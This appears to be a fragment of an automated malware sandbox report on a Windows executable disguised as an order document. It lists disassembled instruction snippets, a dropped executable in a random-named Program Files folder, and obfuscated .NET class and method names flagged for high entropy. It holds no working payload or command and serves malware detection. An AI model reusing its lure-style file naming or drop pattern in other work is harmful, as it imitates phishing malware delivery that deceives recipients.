Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_00A74781 push esi; iretd	0_2_00A74782
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_00A74779 push esi; iretd	0_2_00A7477A
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_00A7AC81 pushfd ; iretd	0_2_00A7AC82
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_00A7AC79 pushfd ; iretd	0_2_00A7AC7A
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_0530654E push ds; iretd	0_2_0530654F
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 0_2_05303AD7 push ebx; retf	0_2_05303ADA
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00402061 push es; iretd	5_2_00402076
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0040C158 push ecx; retf	5_2_0040C159
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_004021D9 push 77CEFDB6h; ret	5_2_004021E0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00417238 push ebx; retf	5_2_00417239
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00411AA5 push esp; iretd	5_2_00411AAB
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00411AB9 push 1CFC06C9h; ret	5_2_00411ABE
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00408300 push es; retf	5_2_0040831F
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_004033A0 push eax; ret	5_2_004033A2
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0040BC07 push ss; ret	5_2_0040BC09
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_004164C3 push ebp; retf 18B7h	5_2_00416449
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0040750F push ebp; retf	5_2_00407510
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_004125BB push esp; ret	5_2_004125CC
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00418F6C push cs; iretd	5_2_00418F71
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00413FE4 push 00000030h; iretd	5_2_00413FE9
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0138225F pushad ; ret	5_2_013827F9
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013827FA pushad ; ret	5_2_013827F9
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013B09AD push ecx; mov dword ptr [esp], ecx	5_2_013B09B6
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0138283D push eax; iretd	5_2_01382858
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01381344 push eax; iretd	5_2_01381369
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Code function: 9_2_04081500 push cs; ret	9_2_04081501
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Code function: 9_2_04074D27 push ecx; retf	9_2_04074D28

Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, OkXB9a4YdprsSPYtim.cs	High entropy of concatenated method names: 'Dispose', 'EfLXSVg0H3', 'onWMFgk4Ec', 'QkmDDs21Rd', 'DFLXm6gb9B', 'Q7fXzYqEvq', 'ProcessDialogKey', 'aQLM2DcgpX', 'd1qMXbu54T', 'MXKMM0VVM0'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, FbfCiLHAwcB6jTs026.cs	High entropy of concatenated method names: 'as98BaWaTv', 'KON8YHwojI', 'ToString', 'm2t8xEFsiv', 'Wbs84Crufv', 'uDp8uUTOVE', 'RHg8bgWgAn', 'B7H8tcs2CY', 'KXa81xJi35', 'hAO8AvuiCx'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, DJO8vVomSf1ydRl3pV.cs	High entropy of concatenated method names: 'aGQ4ptwqlf', 'IkP4wkfKQ8', 'LV94045f6s', 'fyG4HDDR3A', 'wKC4QAIlY7', 'l7T4ykrtZZ', 'UT94EqrpnM', 'Xna4sQWMqK', 'X9J4SMTsoi', 'fdI4mJwYou'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, M0wsTL3r3fuRc7Boqc.cs	High entropy of concatenated method names: 'G0oX1JO8vV', 'YSfXA1ydRl', 'VylXB3gqQ7', 'DXgXY6xEPx', 'BYYXWpd7ZT', 'wqVXvXjyta', 'kT6eTBkgJY8hnJDWSd', 'lxfcYtl8hpGGBG5Bj4', 'PmkXXICqVk', 'wgWXj1qyEr'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, h36j66y444CnFBKR7G.cs	High entropy of concatenated method names: 'oNj8sJ81sV', 'TbP8mlgZci', 'i9UV2eRNf2', 'IyEVXLqT2h', 'EeM8GEtoKN', 'TXo8LsTAkW', 'GID8cVTijI', 'y1a8pM5Fl8', 'BBp8wpi7ng', 'j9o80OACFU'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, Eir6qOiBX37WHUEZgT.cs	High entropy of concatenated method names: 'v701xBBigl', 'Vlm1uK1yZf', 'qMg1tonidj', 'xREtm0iFqq', 't17tzxmeZL', 'txF12hMAkJ', 'WWR1XhoCxg', 'fD81MZtP3J', 'KSB1jgBs5p', 'WE613Q4a53'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, ETASaYckrPsNWXkt9U.cs	High entropy of concatenated method names: 'DBXPoVKmtb', 'OQcPZ45K2A', 'MTXP9NOdhu', 'tYrPF3M51q', 'EdhPTVGOq6', 'kSRPUf0D1p', 'wwaPiZYVrI', 'fiBP5xpaSK', 'YXNPOPInqM', 'Vf8PG9jj2j'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, RS0m6OMYkClxmqgBal.cs	High entropy of concatenated method names: 'WFjRnK8Nm', 'JLka2QnLx', 'kVvegj2dT', 'Vkw6Y0ejb', 'He7ZhKfmT', 'McpqvK0Qm', 'NNNLol5KQfoNwUW6RT', 'Lm2mVms7BvVDON4nSa', 'rOKVYwLJm', 'LQOdUvJaM'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, lQOi7u0sTIIXy3UBMv.cs	High entropy of concatenated method names: 'ToString', 'cRCvGAvqRL', 'Ym5vF9OdRw', 'PFovniqlPa', 'BQ7vTQCW17', 'p6tvU4cClr', 'oInvJ0RFHM', 'WckviX0Mgf', 'QWfv55NKx8', 'fKmv7WMMRE'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, MZTkqV9XjytaaqfcxB.cs	High entropy of concatenated method names: 'O2MtrL7ZZd', 'CYnt47dn0U', 'lUhtbEiK3M', 'a5dt1GQ4Zc', 'A3QtAMHkQp', 'spWbQ7B0GQ', 'zLKbyaDNfg', 'sWLbEAmQ6q', 'nBnbsQu2XG', 'XSfbSajvqw'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.cs	High entropy of concatenated method names: 'bHwjrmVBLQ', 'YKEjxRTn89', 'Q2pj4t6JtQ', 'wAtjut5hdM', 'l0ijbPKrdR', 'Rfgjt3l582', 'Qrcj1xlk4Z', 'fyWjAR5QsU', 'uGyjlVjo3B', 'cqfjBvDQxH'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, PDcgpXSj1qbu54T7XK.cs	High entropy of concatenated method names: 'oMhV9RTvBK', 'VkyVFWQYJ1', 'rslVnd6KKr', 'uKTVTIKgk9', 'bdpVpDVw7v', 'joPVUIKhDc', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, SVVM01mpZ25hLYZ4RI.cs	High entropy of concatenated method names: 'OAKNXBEl4g', 'vuaNjkVJMt', 'uVsN3Dngd8', 'LwQNxBk57H', 'sV2N4rsor3', 'sVxNbTTglq', 'e7qNtXfga4', 'FnkVEZCigg', 'EwqVsP8lgd', 'bhSVSN9of9'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, p3OJO3Xj3WA6yFT9bG2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lXOdpIBptL', 'HcfdwSZI5m', 'JqId0hPLB2', 'AZWdHKOZDe', 'qg6dQU4ShO', 'IjndyIKn5G', 'toldEdc4kb'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, M9EhpapaLJXqtHovTI.cs	High entropy of concatenated method names: 'LB2WOC0vKd', 'gxFWLGxcOd', 'zevWpphlcS', 'AYBWwBqABy', 'H7WWFSVrqy', 'eAmWn0CPOU', 'LnWWTTlmjB', 'ngyWUjriDU', 'ksAWJPLoKR', 'xOBWiREsmc'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, LSsALD7k0xoq1ICkoe.cs	High entropy of concatenated method names: 'tOH1fTeCn3', 'PBn1K13X6j', 'un91RBxDJS', 'LWR1akLpun', 'rFr1CXR8Wv', 'xkM1esRiWY', 'dDt16xZq02', 'g7k1oLaZv3', 'QJh1ZMVTsG', 'WR91qeYbsK'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, oZDxN9X20Mgb54aR6pJ.cs	High entropy of concatenated method names: 'tHONfNL4Ct', 'VPdNKmw5Kk', 'aIMNRNoNPk', 'i1PNahuEeD', 'pJSNC6jfZk', 'O66NeUeL4m', 'QOPN6RcP64', 'cPDNoUslBd', 'QT6NZtiW5C', 'TccNqv8eCT'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, o26AjyZyl3gqQ7oXg6.cs	High entropy of concatenated method names: 'T2QuaAVOq5', 'pR0ue4OQLQ', 'XJKuoFxnNH', 'HmmuZ63kFp', 'rI9uWpu18R', 'H8Xuv42bSQ', 'tdJu8pYTZN', 'KAMuVCo5qt', 'lAguNwjToc', 'DtuudfXIOt'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, GL6gb9sBp7fYqEvq2Q.cs	High entropy of concatenated method names: 'KkiVxEvJ3F', 'KpiV4Uv6ke', 'ioBVuG2auq', 'HXlVb33PMn', 'NUsVtT8Ega', 'kk5V1N03Zj', 'JekVA2et5Q', 'dQbVlFGkfH', 'GfUVBXHQhc', 'yEiVYRgcUO'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, fEPxOLqyxV0ISeYYpd.cs	High entropy of concatenated method names: 'hEmbCiojYN', 'MDib6DjB6I', 'LsLunYOHtF', 'kwOuTHb6Q3', 'qN4uUXAaGk', 'QRhuJKagdx', 'NehuiMuG7Q', 'HL1u5I7oSS', 'kFHu7k0mIY', 'LcCuORBMxF'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, l7GCTdzeZ7vklkKi9T.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OlgNPlIuCu', 't46NW6QBH7', 'vdoNvjFq0f', 'MpXN8jHfsl', 'UuyNV7sA5q', 'IflNNWJBJ9', 'GjhNdnLcpt'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, OkXB9a4YdprsSPYtim.cs	High entropy of concatenated method names: 'Dispose', 'EfLXSVg0H3', 'onWMFgk4Ec', 'QkmDDs21Rd', 'DFLXm6gb9B', 'Q7fXzYqEvq', 'ProcessDialogKey', 'aQLM2DcgpX', 'd1qMXbu54T', 'MXKMM0VVM0'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, FbfCiLHAwcB6jTs026.cs	High entropy of concatenated method names: 'as98BaWaTv', 'KON8YHwojI', 'ToString', 'm2t8xEFsiv', 'Wbs84Crufv', 'uDp8uUTOVE', 'RHg8bgWgAn', 'B7H8tcs2CY', 'KXa81xJi35', 'hAO8AvuiCx'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, DJO8vVomSf1ydRl3pV.cs	High entropy of concatenated method names: 'aGQ4ptwqlf', 'IkP4wkfKQ8', 'LV94045f6s', 'fyG4HDDR3A', 'wKC4QAIlY7', 'l7T4ykrtZZ', 'UT94EqrpnM', 'Xna4sQWMqK', 'X9J4SMTsoi', 'fdI4mJwYou'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, M0wsTL3r3fuRc7Boqc.cs	High entropy of concatenated method names: 'G0oX1JO8vV', 'YSfXA1ydRl', 'VylXB3gqQ7', 'DXgXY6xEPx', 'BYYXWpd7ZT', 'wqVXvXjyta', 'kT6eTBkgJY8hnJDWSd', 'lxfcYtl8hpGGBG5Bj4', 'PmkXXICqVk', 'wgWXj1qyEr'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, h36j66y444CnFBKR7G.cs	High entropy of concatenated method names: 'oNj8sJ81sV', 'TbP8mlgZci', 'i9UV2eRNf2', 'IyEVXLqT2h', 'EeM8GEtoKN', 'TXo8LsTAkW', 'GID8cVTijI', 'y1a8pM5Fl8', 'BBp8wpi7ng', 'j9o80OACFU'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, Eir6qOiBX37WHUEZgT.cs	High entropy of concatenated method names: 'v701xBBigl', 'Vlm1uK1yZf', 'qMg1tonidj', 'xREtm0iFqq', 't17tzxmeZL', 'txF12hMAkJ', 'WWR1XhoCxg', 'fD81MZtP3J', 'KSB1jgBs5p', 'WE613Q4a53'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, ETASaYckrPsNWXkt9U.cs	High entropy of concatenated method names: 'DBXPoVKmtb', 'OQcPZ45K2A', 'MTXP9NOdhu', 'tYrPF3M51q', 'EdhPTVGOq6', 'kSRPUf0D1p', 'wwaPiZYVrI', 'fiBP5xpaSK', 'YXNPOPInqM', 'Vf8PG9jj2j'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, RS0m6OMYkClxmqgBal.cs	High entropy of concatenated method names: 'WFjRnK8Nm', 'JLka2QnLx', 'kVvegj2dT', 'Vkw6Y0ejb', 'He7ZhKfmT', 'McpqvK0Qm', 'NNNLol5KQfoNwUW6RT', 'Lm2mVms7BvVDON4nSa', 'rOKVYwLJm', 'LQOdUvJaM'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, lQOi7u0sTIIXy3UBMv.cs	High entropy of concatenated method names: 'ToString', 'cRCvGAvqRL', 'Ym5vF9OdRw', 'PFovniqlPa', 'BQ7vTQCW17', 'p6tvU4cClr', 'oInvJ0RFHM', 'WckviX0Mgf', 'QWfv55NKx8', 'fKmv7WMMRE'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, MZTkqV9XjytaaqfcxB.cs	High entropy of concatenated method names: 'O2MtrL7ZZd', 'CYnt47dn0U', 'lUhtbEiK3M', 'a5dt1GQ4Zc', 'A3QtAMHkQp', 'spWbQ7B0GQ', 'zLKbyaDNfg', 'sWLbEAmQ6q', 'nBnbsQu2XG', 'XSfbSajvqw'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.cs	High entropy of concatenated method names: 'bHwjrmVBLQ', 'YKEjxRTn89', 'Q2pj4t6JtQ', 'wAtjut5hdM', 'l0ijbPKrdR', 'Rfgjt3l582', 'Qrcj1xlk4Z', 'fyWjAR5QsU', 'uGyjlVjo3B', 'cqfjBvDQxH'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, PDcgpXSj1qbu54T7XK.cs	High entropy of concatenated method names: 'oMhV9RTvBK', 'VkyVFWQYJ1', 'rslVnd6KKr', 'uKTVTIKgk9', 'bdpVpDVw7v', 'joPVUIKhDc', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, SVVM01mpZ25hLYZ4RI.cs	High entropy of concatenated method names: 'OAKNXBEl4g', 'vuaNjkVJMt', 'uVsN3Dngd8', 'LwQNxBk57H', 'sV2N4rsor3', 'sVxNbTTglq', 'e7qNtXfga4', 'FnkVEZCigg', 'EwqVsP8lgd', 'bhSVSN9of9'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, p3OJO3Xj3WA6yFT9bG2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lXOdpIBptL', 'HcfdwSZI5m', 'JqId0hPLB2', 'AZWdHKOZDe', 'qg6dQU4ShO', 'IjndyIKn5G', 'toldEdc4kb'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, M9EhpapaLJXqtHovTI.cs	High entropy of concatenated method names: 'LB2WOC0vKd', 'gxFWLGxcOd', 'zevWpphlcS', 'AYBWwBqABy', 'H7WWFSVrqy', 'eAmWn0CPOU', 'LnWWTTlmjB', 'ngyWUjriDU', 'ksAWJPLoKR', 'xOBWiREsmc'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, LSsALD7k0xoq1ICkoe.cs	High entropy of concatenated method names: 'tOH1fTeCn3', 'PBn1K13X6j', 'un91RBxDJS', 'LWR1akLpun', 'rFr1CXR8Wv', 'xkM1esRiWY', 'dDt16xZq02', 'g7k1oLaZv3', 'QJh1ZMVTsG', 'WR91qeYbsK'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, oZDxN9X20Mgb54aR6pJ.cs	High entropy of concatenated method names: 'tHONfNL4Ct', 'VPdNKmw5Kk', 'aIMNRNoNPk', 'i1PNahuEeD', 'pJSNC6jfZk', 'O66NeUeL4m', 'QOPN6RcP64', 'cPDNoUslBd', 'QT6NZtiW5C', 'TccNqv8eCT'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, o26AjyZyl3gqQ7oXg6.cs	High entropy of concatenated method names: 'T2QuaAVOq5', 'pR0ue4OQLQ', 'XJKuoFxnNH', 'HmmuZ63kFp', 'rI9uWpu18R', 'H8Xuv42bSQ', 'tdJu8pYTZN', 'KAMuVCo5qt', 'lAguNwjToc', 'DtuudfXIOt'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, GL6gb9sBp7fYqEvq2Q.cs	High entropy of concatenated method names: 'KkiVxEvJ3F', 'KpiV4Uv6ke', 'ioBVuG2auq', 'HXlVb33PMn', 'NUsVtT8Ega', 'kk5V1N03Zj', 'JekVA2et5Q', 'dQbVlFGkfH', 'GfUVBXHQhc', 'yEiVYRgcUO'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, fEPxOLqyxV0ISeYYpd.cs	High entropy of concatenated method names: 'hEmbCiojYN', 'MDib6DjB6I', 'LsLunYOHtF', 'kwOuTHb6Q3', 'qN4uUXAaGk', 'QRhuJKagdx', 'NehuiMuG7Q', 'HL1u5I7oSS', 'kFHu7k0mIY', 'LcCuORBMxF'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, l7GCTdzeZ7vklkKi9T.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OlgNPlIuCu', 't46NW6QBH7', 'vdoNvjFq0f', 'MpXN8jHfsl', 'UuyNV7sA5q', 'IflNNWJBJ9', 'GjhNdnLcpt'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, OkXB9a4YdprsSPYtim.cs	High entropy of concatenated method names: 'Dispose', 'EfLXSVg0H3', 'onWMFgk4Ec', 'QkmDDs21Rd', 'DFLXm6gb9B', 'Q7fXzYqEvq', 'ProcessDialogKey', 'aQLM2DcgpX', 'd1qMXbu54T', 'MXKMM0VVM0'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, FbfCiLHAwcB6jTs026.cs	High entropy of concatenated method names: 'as98BaWaTv', 'KON8YHwojI', 'ToString', 'm2t8xEFsiv', 'Wbs84Crufv', 'uDp8uUTOVE', 'RHg8bgWgAn', 'B7H8tcs2CY', 'KXa81xJi35', 'hAO8AvuiCx'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, DJO8vVomSf1ydRl3pV.cs	High entropy of concatenated method names: 'aGQ4ptwqlf', 'IkP4wkfKQ8', 'LV94045f6s', 'fyG4HDDR3A', 'wKC4QAIlY7', 'l7T4ykrtZZ', 'UT94EqrpnM', 'Xna4sQWMqK', 'X9J4SMTsoi', 'fdI4mJwYou'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, M0wsTL3r3fuRc7Boqc.cs	High entropy of concatenated method names: 'G0oX1JO8vV', 'YSfXA1ydRl', 'VylXB3gqQ7', 'DXgXY6xEPx', 'BYYXWpd7ZT', 'wqVXvXjyta', 'kT6eTBkgJY8hnJDWSd', 'lxfcYtl8hpGGBG5Bj4', 'PmkXXICqVk', 'wgWXj1qyEr'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, h36j66y444CnFBKR7G.cs	High entropy of concatenated method names: 'oNj8sJ81sV', 'TbP8mlgZci', 'i9UV2eRNf2', 'IyEVXLqT2h', 'EeM8GEtoKN', 'TXo8LsTAkW', 'GID8cVTijI', 'y1a8pM5Fl8', 'BBp8wpi7ng', 'j9o80OACFU'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, Eir6qOiBX37WHUEZgT.cs	High entropy of concatenated method names: 'v701xBBigl', 'Vlm1uK1yZf', 'qMg1tonidj', 'xREtm0iFqq', 't17tzxmeZL', 'txF12hMAkJ', 'WWR1XhoCxg', 'fD81MZtP3J', 'KSB1jgBs5p', 'WE613Q4a53'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, ETASaYckrPsNWXkt9U.cs	High entropy of concatenated method names: 'DBXPoVKmtb', 'OQcPZ45K2A', 'MTXP9NOdhu', 'tYrPF3M51q', 'EdhPTVGOq6', 'kSRPUf0D1p', 'wwaPiZYVrI', 'fiBP5xpaSK', 'YXNPOPInqM', 'Vf8PG9jj2j'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, RS0m6OMYkClxmqgBal.cs	High entropy of concatenated method names: 'WFjRnK8Nm', 'JLka2QnLx', 'kVvegj2dT', 'Vkw6Y0ejb', 'He7ZhKfmT', 'McpqvK0Qm', 'NNNLol5KQfoNwUW6RT', 'Lm2mVms7BvVDON4nSa', 'rOKVYwLJm', 'LQOdUvJaM'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, lQOi7u0sTIIXy3UBMv.cs	High entropy of concatenated method names: 'ToString', 'cRCvGAvqRL', 'Ym5vF9OdRw', 'PFovniqlPa', 'BQ7vTQCW17', 'p6tvU4cClr', 'oInvJ0RFHM', 'WckviX0Mgf', 'QWfv55NKx8', 'fKmv7WMMRE'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, MZTkqV9XjytaaqfcxB.cs	High entropy of concatenated method names: 'O2MtrL7ZZd', 'CYnt47dn0U', 'lUhtbEiK3M', 'a5dt1GQ4Zc', 'A3QtAMHkQp', 'spWbQ7B0GQ', 'zLKbyaDNfg', 'sWLbEAmQ6q', 'nBnbsQu2XG', 'XSfbSajvqw'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.cs	High entropy of concatenated method names: 'bHwjrmVBLQ', 'YKEjxRTn89', 'Q2pj4t6JtQ', 'wAtjut5hdM', 'l0ijbPKrdR', 'Rfgjt3l582', 'Qrcj1xlk4Z', 'fyWjAR5QsU', 'uGyjlVjo3B', 'cqfjBvDQxH'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, PDcgpXSj1qbu54T7XK.cs	High entropy of concatenated method names: 'oMhV9RTvBK', 'VkyVFWQYJ1', 'rslVnd6KKr', 'uKTVTIKgk9', 'bdpVpDVw7v', 'joPVUIKhDc', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, SVVM01mpZ25hLYZ4RI.cs	High entropy of concatenated method names: 'OAKNXBEl4g', 'vuaNjkVJMt', 'uVsN3Dngd8', 'LwQNxBk57H', 'sV2N4rsor3', 'sVxNbTTglq', 'e7qNtXfga4', 'FnkVEZCigg', 'EwqVsP8lgd', 'bhSVSN9of9'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, p3OJO3Xj3WA6yFT9bG2.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lXOdpIBptL', 'HcfdwSZI5m', 'JqId0hPLB2', 'AZWdHKOZDe', 'qg6dQU4ShO', 'IjndyIKn5G', 'toldEdc4kb'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, M9EhpapaLJXqtHovTI.cs	High entropy of concatenated method names: 'LB2WOC0vKd', 'gxFWLGxcOd', 'zevWpphlcS', 'AYBWwBqABy', 'H7WWFSVrqy', 'eAmWn0CPOU', 'LnWWTTlmjB', 'ngyWUjriDU', 'ksAWJPLoKR', 'xOBWiREsmc'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, LSsALD7k0xoq1ICkoe.cs	High entropy of concatenated method names: 'tOH1fTeCn3', 'PBn1K13X6j', 'un91RBxDJS', 'LWR1akLpun', 'rFr1CXR8Wv', 'xkM1esRiWY', 'dDt16xZq02', 'g7k1oLaZv3', 'QJh1ZMVTsG', 'WR91qeYbsK'
Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, oZDxN9X20Mgb54aR6pJ.cs	High entropy of concatenated method names: 'tHONfNL4Ct', 'VPdNKmw5Kk', 'aIMNRNoNPk', 'i1PNahuEeD', 'pJSNC6jfZk', 'O66NeUeL4m', 'QOPN6RcP64', 'cPDNoUslBd', 'QT6NZtiW5C', 'TccNqv8eCT'
